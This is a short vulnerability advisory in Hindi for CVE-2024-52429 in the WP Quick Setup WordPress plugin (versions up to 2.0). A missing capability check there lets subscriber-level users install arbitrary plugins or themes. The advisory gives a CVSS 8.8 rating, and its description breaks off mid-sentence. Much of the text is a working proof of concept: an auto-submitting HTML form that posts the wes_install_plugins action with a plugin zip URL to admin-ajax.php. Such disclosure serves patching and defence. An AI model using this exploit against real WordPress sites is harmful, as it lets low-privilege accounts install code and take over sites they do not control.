
WP Quick Setup <= 2.0 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए मनमाना प्लगइन/थीम स्थापना के लिए प्राधिकरण की कमी
WP Quick Setup <= 2.0 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए गुम प्राधिकरण, जिससे मनमानी प्लगइन/थीम स्थापना संभव है
WordPress के लिए WP Quick Setup प्लगइन, सभी संस्करणों में 2.0 तक (शामिल) एक फ़ंक्शन पर क्षमता जांच की कमी के कारण अनधिकृत प्लगइन और थीम स्थापना के लिए असुरक्षित है। यह इसे बनाता है
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
सब्सक्राइबर के रूप में लॉगिन करें और फिर यह HTML चलाएं
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wes_install_plugins" />
<input type="hidden" name="plugin_urls[]" value="https://downloads.wordpress.org/plugin/wdes-responsive-mobile-menu.zip" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>